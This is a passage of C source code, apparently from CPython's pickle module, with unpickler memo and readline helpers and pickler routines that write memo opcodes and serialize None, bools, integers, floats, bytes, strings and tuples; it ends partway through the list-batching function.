Returns the number of chars read, or -1 on failure. */
static Py_ssize_t
_Unpickler_Readline(UnpicklerObject *self, char **result)
{
Py_ssize_t i, num_read;
for (i = self->next_read_idx; i < self->input_len; i++) {
if (self->input_buffer[i] == '\n') {
char *line_start = self->input_buffer + self->next_read_idx;
num_read = i - self->next_read_idx + 1;
self->next_read_idx = i + 1;
return _Unpickler_CopyLine(self, line_start, num_read, result);
}
}
if (!self->read)
return bad_readline();
num_read = _Unpickler_ReadFromFile(self, READ_WHOLE_LINE);
if (num_read < 0)
return -1;
if (num_read == 0 || self->input_buffer[num_read - 1] != '\n')
return bad_readline();
self->next_read_idx = num_read;
return _Unpickler_CopyLine(self, self->input_buffer, num_read, result);
}
/* Returns -1 (with an exception set) on failure, 0 on success. The memo array
will be modified in place. */
static int
_Unpickler_ResizeMemoList(UnpicklerObject *self, size_t new_size)
{
size_t i;
assert(new_size > self->memo_size);
PyObject **memo_new = self->memo;
PyMem_RESIZE(memo_new, PyObject *, new_size);
if (memo_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->memo = memo_new;
for (i = self->memo_size; i < new_size; i++)
self->memo[i] = NULL;
self->memo_size = new_size;
return 0;
}
/* Returns NULL if idx is out of bounds. */
static PyObject *
_Unpickler_MemoGet(UnpicklerObject *self, size_t idx)
{
if (idx >= self->memo_size)
return NULL;
return self->memo[idx];
}
/* Returns -1 (with an exception set) on failure, 0 on success.
This takes its own reference to `value`. */
static int
_Unpickler_MemoPut(UnpicklerObject *self, size_t idx, PyObject *value)
{
PyObject *old_item;
if (idx >= self->memo_size) {
if (_Unpickler_ResizeMemoList(self, idx * 2) < 0)
return -1;
assert(idx < self->memo_size);
}
Py_INCREF(value);
old_item = self->memo[idx];
self->memo[idx] = value;
if (old_item != NULL) {
Py_DECREF(old_item);
}
else {
self->memo_len++;
}
return 0;
}
static PyObject **
_Unpickler_NewMemo(Py_ssize_t new_size)
{
PyObject **memo = PyMem_NEW(PyObject *, new_size);
if (memo == NULL) {
PyErr_NoMemory();
return NULL;
}
memset(memo, 0, new_size * sizeof(PyObject *));
return memo;
}
/* Free the unpickler's memo, taking care to decref any items left in it. */
static void
_Unpickler_MemoCleanup(UnpicklerObject *self)
{
Py_ssize_t i;
PyObject **memo = self->memo;
if (self->memo == NULL)
return;
self->memo = NULL;
i = self->memo_size;
while (--i >= 0) {
Py_XDECREF(memo[i]);
}
PyMem_FREE(memo);
}
static UnpicklerObject *
_Unpickler_New(void)
{
UnpicklerObject *self;
self = PyObject_GC_New(UnpicklerObject, &Unpickler_Type);
if (self == NULL)
return NULL;
self->pers_func = NULL;
self->input_buffer = NULL;
self->input_line = NULL;
self->input_len = 0;
self->next_read_idx = 0;
self->prefetched_idx = 0;
self->read = NULL;
self->readline = NULL;
self->peek = NULL;
self->encoding = NULL;
self->errors = NULL;
self->marks = NULL;
self->num_marks = 0;
self->marks_size = 0;
self->proto = 0;
self->fix_imports = 0;
memset(&self->buffer, 0, sizeof(Py_buffer));
self->memo_size = 32;
self->memo_len = 0;
self->memo = _Unpickler_NewMemo(self->memo_size);
self->stack = (Pdata *)Pdata_New();
if (self->memo == NULL || self->stack == NULL) {
Py_DECREF(self);
return NULL;
}
return self;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Unpickler_SetInputStream(UnpicklerObject *self, PyObject *file)
{
_Py_IDENTIFIER(peek);
_Py_IDENTIFIER(read);
_Py_IDENTIFIER(readline);
if (_PyObject_LookupAttrId(file, &PyId_peek, &self->peek) < 0) {
return -1;
}
(void)_PyObject_LookupAttrId(file, &PyId_read, &self->read);
(void)_PyObject_LookupAttrId(file, &PyId_readline, &self->readline);
if (self->readline == NULL || self->read == NULL) {
if (!PyErr_Occurred()) {
PyErr_SetString(PyExc_TypeError,
"file must have 'read' and 'readline' attributes");
}
Py_CLEAR(self->read);
Py_CLEAR(self->readline);
Py_CLEAR(self->peek);
return -1;
}
return 0;
}
/* Returns -1 (with an exception set) on failure, 0 on success. This may
be called once on a freshly created Pickler. */
static int
_Unpickler_SetInputEncoding(UnpicklerObject *self,
const char *encoding,
const char *errors)
{
if (encoding == NULL)
encoding = "ASCII";
if (errors == NULL)
errors = "strict";
self->encoding = _PyMem_Strdup(encoding);
self->errors = _PyMem_Strdup(errors);
if (self->encoding == NULL || self->errors == NULL) {
PyErr_NoMemory();
return -1;
}
return 0;
}
/* Generate a GET opcode for an object stored in the memo. */
static int
memo_get(PicklerObject *self, PyObject *key)
{
Py_ssize_t *value;
char pdata[30];
Py_ssize_t len;
value = PyMemoTable_Get(self->memo, key);
if (value == NULL) {
PyErr_SetObject(PyExc_KeyError, key);
return -1;
}
if (!self->bin) {
pdata[0] = GET;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", *value);
len = strlen(pdata);
}
else {
if (*value < 256) {
pdata[0] = BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
len = 2;
}
else if ((size_t)*value <= 0xffffffffUL) {
pdata[0] = LONG_BINGET;
pdata[1] = (unsigned char)(*value & 0xff);
pdata[2] = (unsigned char)((*value >> 8) & 0xff);
pdata[3] = (unsigned char)((*value >> 16) & 0xff);
pdata[4] = (unsigned char)((*value >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINGET");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
/* Store an object in the memo, assign it a new unique ID based on the number
of objects currently stored in the memo and generate a PUT opcode. */
static int
memo_put(PicklerObject *self, PyObject *obj)
{
char pdata[30];
Py_ssize_t len;
Py_ssize_t idx;
const char memoize_op = MEMOIZE;
if (self->fast)
return 0;
idx = PyMemoTable_Size(self->memo);
if (PyMemoTable_Set(self->memo, obj, idx) < 0)
return -1;
if (self->proto >= 4) {
if (_Pickler_Write(self, &memoize_op, 1) < 0)
return -1;
return 0;
}
else if (!self->bin) {
pdata[0] = PUT;
PyOS_snprintf(pdata + 1, sizeof(pdata) - 1,
"%" PY_FORMAT_SIZE_T "d\n", idx);
len = strlen(pdata);
}
else {
if (idx < 256) {
pdata[0] = BINPUT;
pdata[1] = (unsigned char)idx;
len = 2;
}
else if ((size_t)idx <= 0xffffffffUL) {
pdata[0] = LONG_BINPUT;
pdata[1] = (unsigned char)(idx & 0xff);
pdata[2] = (unsigned char)((idx >> 8) & 0xff);
pdata[3] = (unsigned char)((idx >> 16) & 0xff);
pdata[4] = (unsigned char)((idx >> 24) & 0xff);
len = 5;
}
else { /* unlikely */
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"memo id too large for LONG_BINPUT");
return -1;
}
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
static PyObject *
get_dotted_path(PyObject *obj, PyObject *name)
{
_Py_static_string(PyId_dot, ".");
PyObject *dotted_path;
Py_ssize_t i, n;
dotted_path = PyUnicode_Split(name, _PyUnicode_FromId(&PyId_dot), -1);
if (dotted_path == NULL)
return NULL;
n = PyList_GET_SIZE(dotted_path);
assert(n >= 1);
for (i = 0; i < n; i++) {
PyObject *subpath = PyList_GET_ITEM(dotted_path, i);
if (_PyUnicode_EqualToASCIIString(subpath, "<locals>")) {
if (obj == NULL)
PyErr_Format(PyExc_AttributeError,
"Can't pickle local object %R", name);
else
PyErr_Format(PyExc_AttributeError,
"Can't pickle local attribute %R on %R", name, obj);
Py_DECREF(dotted_path);
return NULL;
}
}
return dotted_path;
}
static PyObject *
get_deep_attribute(PyObject *obj, PyObject *names, PyObject **pparent)
{
Py_ssize_t i, n;
PyObject *parent = NULL;
assert(PyList_CheckExact(names));
Py_INCREF(obj);
n = PyList_GET_SIZE(names);
for (i = 0; i < n; i++) {
PyObject *name = PyList_GET_ITEM(names, i);
Py_XDECREF(parent);
parent = obj;
(void)_PyObject_LookupAttr(parent, name, &obj);
if (obj == NULL) {
Py_DECREF(parent);
return NULL;
}
}
if (pparent != NULL)
*pparent = parent;
else
Py_XDECREF(parent);
return obj;
}
static PyObject *
getattribute(PyObject *obj, PyObject *name, int allow_qualname)
{
PyObject *dotted_path, *attr;
if (allow_qualname) {
dotted_path = get_dotted_path(obj, name);
if (dotted_path == NULL)
return NULL;
attr = get_deep_attribute(obj, dotted_path, NULL);
Py_DECREF(dotted_path);
}
else {
(void)_PyObject_LookupAttr(obj, name, &attr);
}
if (attr == NULL && !PyErr_Occurred()) {
PyErr_Format(PyExc_AttributeError,
"Can't get attribute %R on %R", name, obj);
}
return attr;
}
static int
_checkmodule(PyObject *module_name, PyObject *module,
PyObject *global, PyObject *dotted_path)
{
if (module == Py_None) {
return -1;
}
if (PyUnicode_Check(module_name) &&
_PyUnicode_EqualToASCIIString(module_name, "__main__")) {
return -1;
}
PyObject *candidate = get_deep_attribute(module, dotted_path, NULL);
if (candidate == NULL) {
return -1;
}
if (candidate != global) {
Py_DECREF(candidate);
return -1;
}
Py_DECREF(candidate);
return 0;
}
static PyObject *
whichmodule(PyObject *global, PyObject *dotted_path)
{
PyObject *module_name;
PyObject *module = NULL;
Py_ssize_t i;
PyObject *modules;
_Py_IDENTIFIER(__module__);
_Py_IDENTIFIER(modules);
_Py_IDENTIFIER(__main__);
if (_PyObject_LookupAttrId(global, &PyId___module__, &module_name) < 0) {
return NULL;
}
if (module_name) {
/* In some rare cases (e.g., bound methods of extension types),
__module__ can be None. If it is so, then search sys.modules for
the module of global. */
if (module_name != Py_None)
return module_name;
Py_CLEAR(module_name);
}
assert(module_name == NULL);
/* Fallback on walking sys.modules */
modules = _PySys_GetObjectId(&PyId_modules);
if (modules == NULL) {
PyErr_SetString(PyExc_RuntimeError, "unable to get sys.modules");
return NULL;
}
if (PyDict_CheckExact(modules)) {
i = 0;
while (PyDict_Next(modules, &i, &module_name, &module)) {
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_INCREF(module_name);
return module_name;
}
if (PyErr_Occurred()) {
return NULL;
}
}
}
else {
PyObject *iterator = PyObject_GetIter(modules);
if (iterator == NULL) {
return NULL;
}
while ((module_name = PyIter_Next(iterator))) {
module = PyObject_GetItem(modules, module_name);
if (module == NULL) {
Py_DECREF(module_name);
Py_DECREF(iterator);
return NULL;
}
if (_checkmodule(module_name, module, global, dotted_path) == 0) {
Py_DECREF(module);
Py_DECREF(iterator);
return module_name;
}
Py_DECREF(module);
Py_DECREF(module_name);
if (PyErr_Occurred()) {
Py_DECREF(iterator);
return NULL;
}
}
Py_DECREF(iterator);
}
/* If no module is found, use __main__. */
module_name = _PyUnicode_FromId(&PyId___main__);
Py_XINCREF(module_name);
return module_name;
}
/* fast_save_enter() and fast_save_leave() are guards against recursive
objects when Pickler is used with the "fast mode" (i.e., with object
memoization disabled). If the nesting of a list or dict object exceed
FAST_NESTING_LIMIT, these guards will start keeping an internal
reference to the seen list or dict objects and check whether these objects
are recursive. These are not strictly necessary, since save() has a
hard-coded recursion limit, but they give a nicer error message than the
typical RuntimeError. */
static int
fast_save_enter(PicklerObject *self, PyObject *obj)
{
/* if fast_nesting < 0, we're doing an error exit. */
if (++self->fast_nesting >= FAST_NESTING_LIMIT) {
PyObject *key = NULL;
if (self->fast_memo == NULL) {
self->fast_memo = PyDict_New();
if (self->fast_memo == NULL) {
self->fast_nesting = -1;
return 0;
}
}
key = PyLong_FromVoidPtr(obj);
if (key == NULL) {
self->fast_nesting = -1;
return 0;
}
if (PyDict_GetItemWithError(self->fast_memo, key)) {
Py_DECREF(key);
PyErr_Format(PyExc_ValueError,
"fast mode: can't pickle cyclic objects "
"including object type %.200s at %p",
obj->ob_type->tp_name, obj);
self->fast_nesting = -1;
return 0;
}
if (PyErr_Occurred()) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
if (PyDict_SetItem(self->fast_memo, key, Py_None) < 0) {
Py_DECREF(key);
self->fast_nesting = -1;
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
fast_save_leave(PicklerObject *self, PyObject *obj)
{
if (self->fast_nesting-- >= FAST_NESTING_LIMIT) {
PyObject *key = PyLong_FromVoidPtr(obj);
if (key == NULL)
return 0;
if (PyDict_DelItem(self->fast_memo, key) < 0) {
Py_DECREF(key);
return 0;
}
Py_DECREF(key);
}
return 1;
}
static int
save_none(PicklerObject *self, PyObject *obj)
{
const char none_op = NONE;
if (_Pickler_Write(self, &none_op, 1) < 0)
return -1;
return 0;
}
static int
save_bool(PicklerObject *self, PyObject *obj)
{
if (self->proto >= 2) {
const char bool_op = (obj == Py_True) ? NEWTRUE : NEWFALSE;
if (_Pickler_Write(self, &bool_op, 1) < 0)
return -1;
}
else {
/* These aren't opcodes -- they're ways to pickle bools before protocol 2
* so that unpicklers written before bools were introduced unpickle them
* as ints, but unpicklers after can recognize that bools were intended.
* Note that protocol 2 added direct ways to pickle bools.
*/
const char *bool_str = (obj == Py_True) ? "I01\n" : "I00\n";
if (_Pickler_Write(self, bool_str, strlen(bool_str)) < 0)
return -1;
}
return 0;
}
static int
save_long(PicklerObject *self, PyObject *obj)
{
PyObject *repr = NULL;
Py_ssize_t size;
long val;
int overflow;
int status = 0;
val= PyLong_AsLongAndOverflow(obj, &overflow);
if (!overflow && (sizeof(long) <= 4 ||
(val <= 0x7fffffffL && val >= (-0x7fffffffL - 1))))
{
/* result fits in a signed 4-byte integer.
Note: we can't use -0x80000000L in the above condition because some
compilers (e.g., MSVC) will promote 0x80000000L to an unsigned type
before applying the unary minus when sizeof(long) <= 4. The
resulting value stays unsigned which is commonly not what we want,
so MSVC happily warns us about it. However, that result would have
been fine because we guard for sizeof(long) <= 4 which turns the
condition true in that particular case. */
char pdata[32];
Py_ssize_t len = 0;
if (self->bin) {
pdata[1] = (unsigned char)(val & 0xff);
pdata[2] = (unsigned char)((val >> 8) & 0xff);
pdata[3] = (unsigned char)((val >> 16) & 0xff);
pdata[4] = (unsigned char)((val >> 24) & 0xff);
if ((pdata[4] != 0) || (pdata[3] != 0)) {
pdata[0] = BININT;
len = 5;
}
else if (pdata[2] != 0) {
pdata[0] = BININT2;
len = 3;
}
else {
pdata[0] = BININT1;
len = 2;
}
}
else {
sprintf(pdata, "%c%ld\n", INT, val);
len = strlen(pdata);
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
assert(!PyErr_Occurred());
if (self->proto >= 2) {
/* Linear-time pickling. */
size_t nbits;
size_t nbytes;
unsigned char *pdata;
char header[5];
int i;
int sign = _PyLong_Sign(obj);
if (sign == 0) {
header[0] = LONG1;
header[1] = 0; /* It's 0 -- an empty bytestring. */
if (_Pickler_Write(self, header, 2) < 0)
goto error;
return 0;
}
nbits = _PyLong_NumBits(obj);
if (nbits == (size_t)-1 && PyErr_Occurred())
goto error;
/* How many bytes do we need? There are nbits >> 3 full
* bytes of data, and nbits & 7 leftover bits. If there
* are any leftover bits, then we clearly need another
* byte. Wnat's not so obvious is that we *probably*
* need another byte even if there aren't any leftovers:
* the most-significant bit of the most-significant byte
* acts like a sign bit, and it's usually got a sense
* opposite of the one we need. The exception is ints
* of the form -(2**(8*j-1)) for j > 0. Such an int is
* its own 256's-complement, so has the right sign bit
* even without the extra byte. That's a pain to check
* for in advance, though, so we always grab an extra
* byte at the start, and cut it back later if possible.
*/
nbytes = (nbits >> 3) + 1;
if (nbytes > 0x7fffffffL) {
PyErr_SetString(PyExc_OverflowError,
"int too large to pickle");
goto error;
}
repr = PyBytes_FromStringAndSize(NULL, (Py_ssize_t)nbytes);
if (repr == NULL)
goto error;
pdata = (unsigned char *)PyBytes_AS_STRING(repr);
i = _PyLong_AsByteArray((PyLongObject *)obj,
pdata, nbytes,
1 /* little endian */ , 1 /* signed */ );
if (i < 0)
goto error;
/* If the int is negative, this may be a byte more than
* needed. This is so iff the MSB is all redundant sign
* bits.
*/
if (sign < 0 &&
nbytes > 1 &&
pdata[nbytes - 1] == 0xff &&
(pdata[nbytes - 2] & 0x80) != 0) {
nbytes--;
}
if (nbytes < 256) {
header[0] = LONG1;
header[1] = (unsigned char)nbytes;
size = 2;
}
else {
header[0] = LONG4;
size = (Py_ssize_t) nbytes;
for (i = 1; i < 5; i++) {
header[i] = (unsigned char)(size & 0xff);
size >>= 8;
}
size = 5;
}
if (_Pickler_Write(self, header, size) < 0 ||
_Pickler_Write(self, (char *)pdata, (int)nbytes) < 0)
goto error;
}
else {
const char long_op = LONG;
const char *string;
/* proto < 2: write the repr and newline. This is quadratic-time (in
the number of digits), in both directions. We add a trailing 'L'
to the repr, for compatibility with Python 2.x. */
repr = PyObject_Repr(obj);
if (repr == NULL)
goto error;
string = PyUnicode_AsUTF8AndSize(repr, &size);
if (string == NULL)
goto error;
if (_Pickler_Write(self, &long_op, 1) < 0 ||
_Pickler_Write(self, string, size) < 0 ||
_Pickler_Write(self, "L\n", 2) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(repr);
return status;
}
static int
save_float(PicklerObject *self, PyObject *obj)
{
double x = PyFloat_AS_DOUBLE((PyFloatObject *)obj);
if (self->bin) {
char pdata[9];
pdata[0] = BINFLOAT;
if (_PyFloat_Pack8(x, (unsigned char *)&pdata[1], 0) < 0)
return -1;
if (_Pickler_Write(self, pdata, 9) < 0)
return -1;
}
else {
int result = -1;
char *buf = NULL;
char op = FLOAT;
if (_Pickler_Write(self, &op, 1) < 0)
goto done;
buf = PyOS_double_to_string(x, 'r', 0, Py_DTSF_ADD_DOT_0, NULL);
if (!buf) {
PyErr_NoMemory();
goto done;
}
if (_Pickler_Write(self, buf, strlen(buf)) < 0)
goto done;
if (_Pickler_Write(self, "\n", 1) < 0)
goto done;
result = 0;
done:
PyMem_Free(buf);
return result;
}
return 0;
}
/* Perform direct write of the header and payload of the binary object.
The large contiguous data is written directly into the underlying file
object, bypassing the output_buffer of the Pickler. We intentionally
do not insert a protocol 4 frame opcode to make it possible to optimize
file.read calls in the loader.
*/
static int
_Pickler_write_bytes(PicklerObject *self,
const char *header, Py_ssize_t header_size,
const char *data, Py_ssize_t data_size,
PyObject *payload)
{
int bypass_buffer = (data_size >= FRAME_SIZE_TARGET);
int framing = self->framing;
if (bypass_buffer) {
assert(self->output_buffer != NULL);
/* Commit the previous frame. */
if (_Pickler_CommitFrame(self)) {
return -1;
}
/* Disable framing temporarily */
self->framing = 0;
}
if (_Pickler_Write(self, header, header_size) < 0) {
return -1;
}
if (bypass_buffer && self->write != NULL) {
/* Bypass the in-memory buffer to directly stream large data
into the underlying file object. */
PyObject *result, *mem = NULL;
/* Dump the output buffer to the file. */
if (_Pickler_FlushToFile(self) < 0) {
return -1;
}
/* Stream write the payload into the file without going through the
output buffer. */
if (payload == NULL) {
/* TODO: It would be better to use a memoryview with a linked
original string if this is possible. */
payload = mem = PyBytes_FromStringAndSize(data, data_size);
if (payload == NULL) {
return -1;
}
}
result = PyObject_CallFunctionObjArgs(self->write, payload, NULL);
Py_XDECREF(mem);
if (result == NULL) {
return -1;
}
Py_DECREF(result);
/* Reinitialize the buffer for subsequent calls to _Pickler_Write. */
if (_Pickler_ClearBuffer(self) < 0) {
return -1;
}
}
else {
if (_Pickler_Write(self, data, data_size) < 0) {
return -1;
}
}
/* Re-enable framing for subsequent calls to _Pickler_Write. */
self->framing = framing;
return 0;
}
static int
save_bytes(PicklerObject *self, PyObject *obj)
{
if (self->proto < 3) {
/* Older pickle protocols do not have an opcode for pickling bytes
objects. Therefore, we need to fake the copy protocol (i.e.,
the __reduce__ method) to permit bytes object unpickling.
Here we use a hack to be compatible with Python 2. Since in Python
2 'bytes' is just an alias for 'str' (which has different
parameters than the actual bytes object), we use codecs.encode
to create the appropriate 'str' object when unpickled using
Python 2 *and* the appropriate 'bytes' object when unpickled
using Python 3. Again this is a hack and we don't need to do this
with newer protocols. */
PyObject *reduce_value = NULL;
int status;
if (PyBytes_GET_SIZE(obj) == 0) {
reduce_value = Py_BuildValue("(O())", (PyObject*)&PyBytes_Type);
}
else {
PickleState *st = _Pickle_GetGlobalState();
PyObject *unicode_str =
PyUnicode_DecodeLatin1(PyBytes_AS_STRING(obj),
PyBytes_GET_SIZE(obj),
"strict");
_Py_IDENTIFIER(latin1);
if (unicode_str == NULL)
return -1;
reduce_value = Py_BuildValue("(O(OO))",
st->codecs_encode, unicode_str,
_PyUnicode_FromId(&PyId_latin1));
Py_DECREF(unicode_str);
}
if (reduce_value == NULL)
return -1;
/* save_reduce() will memoize the object automatically. */
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
else {
Py_ssize_t size;
char header[9];
Py_ssize_t len;
size = PyBytes_GET_SIZE(obj);
if (size < 0)
return -1;
if (size <= 0xff) {
header[0] = SHORT_BINBYTES;
header[1] = (unsigned char)size;
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINBYTES;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINBYTES8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a bytes object larger than 4 GiB");
return -1; /* string too large */
}
if (_Pickler_write_bytes(self, header, len,
PyBytes_AS_STRING(obj), size, obj) < 0)
{
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
}
/* A copy of PyUnicode_EncodeRawUnicodeEscape() that also translates
backslash and newline characters to \uXXXX escapes. */
static PyObject *
raw_unicode_escape(PyObject *obj)
{
char *p;
Py_ssize_t i, size;
void *data;
unsigned int kind;
_PyBytesWriter writer;
if (PyUnicode_READY(obj))
return NULL;
_PyBytesWriter_Init(&writer);
size = PyUnicode_GET_LENGTH(obj);
data = PyUnicode_DATA(obj);
kind = PyUnicode_KIND(obj);
p = _PyBytesWriter_Alloc(&writer, size);
if (p == NULL)
goto error;
writer.overallocate = 1;
for (i=0; i < size; i++) {
Py_UCS4 ch = PyUnicode_READ(kind, data, i);
/* Map 32-bit characters to '\Uxxxxxxxx' */
if (ch >= 0x10000) {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 10-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'U';
*p++ = Py_hexdigits[(ch >> 28) & 0xf];
*p++ = Py_hexdigits[(ch >> 24) & 0xf];
*p++ = Py_hexdigits[(ch >> 20) & 0xf];
*p++ = Py_hexdigits[(ch >> 16) & 0xf];
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Map 16-bit characters, '\\' and '\n' to '\uxxxx' */
else if (ch >= 256 || ch == '\\' || ch == '\n') {
/* -1: subtract 1 preallocated byte */
p = _PyBytesWriter_Prepare(&writer, p, 6-1);
if (p == NULL)
goto error;
*p++ = '\\';
*p++ = 'u';
*p++ = Py_hexdigits[(ch >> 12) & 0xf];
*p++ = Py_hexdigits[(ch >> 8) & 0xf];
*p++ = Py_hexdigits[(ch >> 4) & 0xf];
*p++ = Py_hexdigits[ch & 15];
}
/* Copy everything else as-is */
else
*p++ = (char) ch;
}
return _PyBytesWriter_Finish(&writer, p);
error:
_PyBytesWriter_Dealloc(&writer);
return NULL;
}
static int
write_unicode_binary(PicklerObject *self, PyObject *obj)
{
char header[9];
Py_ssize_t len;
PyObject *encoded = NULL;
Py_ssize_t size;
const char *data;
if (PyUnicode_READY(obj))
return -1;
data = PyUnicode_AsUTF8AndSize(obj, &size);
if (data == NULL) {
/* Issue #8383: for strings with lone surrogates, fallback on the
"surrogatepass" error handler. */
PyErr_Clear();
encoded = PyUnicode_AsEncodedString(obj, "utf-8", "surrogatepass");
if (encoded == NULL)
return -1;
data = PyBytes_AS_STRING(encoded);
size = PyBytes_GET_SIZE(encoded);
}
assert(size >= 0);
if (size <= 0xff && self->proto >= 4) {
header[0] = SHORT_BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
len = 2;
}
else if ((size_t)size <= 0xffffffffUL) {
header[0] = BINUNICODE;
header[1] = (unsigned char)(size & 0xff);
header[2] = (unsigned char)((size >> 8) & 0xff);
header[3] = (unsigned char)((size >> 16) & 0xff);
header[4] = (unsigned char)((size >> 24) & 0xff);
len = 5;
}
else if (self->proto >= 4) {
header[0] = BINUNICODE8;
_write_size64(header + 1, size);
len = 9;
}
else {
PyErr_SetString(PyExc_OverflowError,
"cannot serialize a string larger than 4GiB");
Py_XDECREF(encoded);
return -1;
}
if (_Pickler_write_bytes(self, header, len, data, size, encoded) < 0) {
Py_XDECREF(encoded);
return -1;
}
Py_XDECREF(encoded);
return 0;
}
static int
save_unicode(PicklerObject *self, PyObject *obj)
{
if (self->bin) {
if (write_unicode_binary(self, obj) < 0)
return -1;
}
else {
PyObject *encoded;
Py_ssize_t size;
const char unicode_op = UNICODE;
encoded = raw_unicode_escape(obj);
if (encoded == NULL)
return -1;
if (_Pickler_Write(self, &unicode_op, 1) < 0) {
Py_DECREF(encoded);
return -1;
}
size = PyBytes_GET_SIZE(encoded);
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded), size) < 0) {
Py_DECREF(encoded);
return -1;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
return -1;
}
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* A helper for save_tuple. Push the len elements in tuple t on the stack. */
static int
store_tuple_elements(PicklerObject *self, PyObject *t, Py_ssize_t len)
{
Py_ssize_t i;
assert(PyTuple_Size(t) == len);
for (i = 0; i < len; i++) {
PyObject *element = PyTuple_GET_ITEM(t, i);
if (element == NULL)
return -1;
if (save(self, element, 0) < 0)
return -1;
}
return 0;
}
/* Tuples are ubiquitous in the pickle protocols, so many techniques are
* used across protocols to minimize the space needed to pickle them.
* Tuples are also the only builtin immutable type that can be recursive
* (a tuple can be reached from itself), and that requires some subtle
* magic so that it works in all cases. IOW, this is a long routine.
*/
static int
save_tuple(PicklerObject *self, PyObject *obj)
{
Py_ssize_t len, i;
const char mark_op = MARK;
const char tuple_op = TUPLE;
const char pop_op = POP;
const char pop_mark_op = POP_MARK;
const char len2opcode[] = {EMPTY_TUPLE, TUPLE1, TUPLE2, TUPLE3};
if ((len = PyTuple_Size(obj)) < 0)
return -1;
if (len == 0) {
char pdata[2];
if (self->proto) {
pdata[0] = EMPTY_TUPLE;
len = 1;
}
else {
pdata[0] = MARK;
pdata[1] = TUPLE;
len = 2;
}
if (_Pickler_Write(self, pdata, len) < 0)
return -1;
return 0;
}
/* The tuple isn't in the memo now. If it shows up there after
* saving the tuple elements, the tuple must be recursive, in
* which case we'll pop everything we put on the stack, and fetch
* its value from the memo.
*/
if (len <= 3 && self->proto >= 2) {
/* Use TUPLE{1,2,3} opcodes. */
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the len elements */
for (i = 0; i < len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, len2opcode + len, 1) < 0)
return -1;
}
goto memoize;
}
/* proto < 2 and len > 0, or proto >= 2 and len > 3.
* Generate MARK e1 e2 ... TUPLE
*/
if (_Pickler_Write(self, &mark_op, 1) < 0)
return -1;
if (store_tuple_elements(self, obj, len) < 0)
return -1;
if (PyMemoTable_Get(self->memo, obj)) {
/* pop the stack stuff we pushed */
if (self->bin) {
if (_Pickler_Write(self, &pop_mark_op, 1) < 0)
return -1;
}
else {
/* Note that we pop one more than len, to remove
* the MARK too.
*/
for (i = 0; i <= len; i++)
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
}
/* fetch from memo */
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else { /* Not recursive. */
if (_Pickler_Write(self, &tuple_op, 1) < 0)
return -1;
}
memoize:
if (memo_put(self, obj) < 0)
return -1;
return 0;
}
/* iter is an iterator giving items, and we batch up chunks of
* MARK item item ... item APPENDS
* opcode sequences. Calling code should have arranged to first create an
* empty list, or list-like object, for the APPENDS to operate on.
* Returns 0 on success, <0 on error.
*/
static int
batch_list(PicklerObject *self, PyObject *iter)
{
PyObject *obj = NULL;
PyObject *firstitem = NULL;
int i, n;
const char mark_op = MARK;
const char append_op = APPEND;
const char appends_op = APPENDS;
assert(iter != NULL);
/* XXX: I think this function could be made faster by avoiding the
iterator interface and fetching objects directly from list using
PyList_GET_ITEM.
*/
if (self->proto == 0) {
/* APPENDS isn't available; do one at a time. */
for (;;) {
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
return -1;
break;
}
i = save(self, obj, 0);
Py_DECREF(obj);
if (i < 0)
return -1;
if (_Pickler_Write(self, &append_op, 1) < 0)
return -1;
}
return 0;
}
/* proto > 0: write in batches of BATCHSIZE. */
do {
/* Get first item */
firstitem = PyIter_Next(iter);
if (firstitem == NULL) {
if (PyErr_Occurred())
goto error;
/* nothing more to add */
break;
}
/* Try to get a second item */
obj = PyIter_Next(iter);
if (obj == NULL) {
if (PyErr_Occurred())
goto error;
/* Only one item to write */
if (save(self, firstitem, 0) < 0)
goto error;
if (_Pickler_Write(self, &append_op, 1) < 0)
goto error;
Py_CLEAR(firstitem);
break;
}
/* More than one item to write */
/* Pump out MARK, items, APPENDS. */
if (_Pickler_Write(self, &mark_op, 1) < 0)
goto error;
if (save(self, firstitem, 0) < 0)
goto error;
Py_CLEAR(firstitem);
n = 1;
